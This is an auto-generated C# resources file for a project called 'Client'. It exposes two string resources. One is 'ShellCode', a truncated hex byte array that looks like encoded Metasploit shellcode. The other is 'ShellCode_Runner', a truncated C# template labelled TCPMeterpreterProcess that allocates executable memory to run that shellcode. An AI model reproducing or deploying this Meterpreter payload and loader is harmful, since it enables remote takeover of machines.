//------------------------------------------------------------------------------
// <auto-generated>
//     This code was generated by a tool.
//     Runtime Version:4.0.30319.42000
//
//     Changes to this file may cause incorrect behavior and will be lost if
//     the code is regenerated.
// </auto-generated>
//------------------------------------------------------------------------------

namespace Client.Properties {
    using System;
    
    
    /// <summary>
    ///   A strongly-typed resource class, for looking up localized strings, etc.
    /// </summary>
    // This class was auto-generated by the StronglyTypedResourceBuilder
    // class via a tool like ResGen or Visual Studio.
    // To add or remove a member, edit your .ResX file then rerun ResGen
    // with the /str option, or rebuild your VS project.
    [global::System.CodeDom.Compiler.GeneratedCodeAttribute("System.Resources.Tools.StronglyTypedResourceBuilder", "16.0.0.0")]
    [global::System.Diagnostics.DebuggerNonUserCodeAttribute()]
    [global::System.Runtime.CompilerServices.CompilerGeneratedAttribute()]
    internal class Resources {
        
        private static global::System.Resources.ResourceManager resourceMan;
        
        private static global::System.Globalization.CultureInfo resourceCulture;
        
        [global::System.Diagnostics.CodeAnalysis.SuppressMessageAttribute("Microsoft.Performance", "CA1811:AvoidUncalledPrivateCode")]
        internal Resources() {
        }
        
        /// <summary>
        ///   Returns the cached ResourceManager instance used by this class.
        /// </summary>
        [global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)]
        internal static global::System.Resources.ResourceManager ResourceManager {
            get {
                if (object.ReferenceEquals(resourceMan, null)) {
                    global::System.Resources.ResourceManager temp = new global::System.Resources.ResourceManager("Client.Properties.Resources", typeof(Resources).Assembly);
                    resourceMan = temp;
                }
                return resourceMan;
            }
        }
        
        /// <summary>
        ///   Overrides the current thread's CurrentUICulture property for all
        ///   resource lookups using this strongly typed resource class.
        /// </summary>
        [global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)]
        internal static global::System.Globalization.CultureInfo Culture {
            get {
                return resourceCulture;
            }
            set {
                resourceCulture = value;
            }
        }
        
        /// <summary>
        ///   Looks up a localized string similar to 0xd9,0xe8,0xd9,0x74,0x24,0xf4,0xbd,0xb5,0x43,0x89,0xe1,0x58,0x29,0xc9,0xb1,
        ///0xb8,0x31,0x68,0x17,0x03,0x68,0x17,0x83,0x75,0x47,0x6b,0x14,0xc8,0xd5,0x49,
        ///0x22,0xab,0x3c,0x49,0x15,0xbf,0xe4,0xa6,0xfe,0x0e,0x2c,0xf7,0x4e,0x41,0xc6,
        ///0xeb,0xb3,0xc9,0x05,0x8f,0x5c,0x68,0xea,0x8f,0xdf,0x31,0x57,0xe5,0xa6,0x2d,
        ///0x14,0x4f,0xae,0x87,0x63,0xaf,0x93,0x2c,0xe2,0xc5,0x38,0x6b,0x6d,0x12,0x80,
        ///0x4a,0xe6,0x2e,0xd6,0x16,0x80,0x56,0xad,0xe2,0x31,0x0b,0x74,0x21,0xab,0x81,
        ///0x80,0xcd,0xb1,0xbf,0x27,0x51,0x43,0x66,0xb5,0x57, [rest of string was truncated]&quot;;.
        /// </summary>
        internal static string ShellCode {
            get {
                return ResourceManager.GetString("ShellCode", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Looks up a localized string similar to using System;
        ///using System.Collections.Generic;
        ///using System.Linq;
        ///using System.Text;
        ///using System.Threading.Tasks;
        ///using System.Runtime.InteropServices;
        ///
        ///namespace TCPMeterpreterProcess {
        ///  class Program {
        ///   static void Main(string[] args){
        ///      // native function&apos;s compiled code
        ///      // generated with metasploit
        ///      byte[] shellcode = new byte[] {
        ///        [SHELLCODE]
        ///      };
        ///      
        ///      UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE);        /// [rest of string was truncated]&quot;;.
        /// </summary>
        internal static string ShellCode_Runner {
            get {
                return ResourceManager.GetString("ShellCode_Runner", resourceCulture);
            }
        }
    }
}
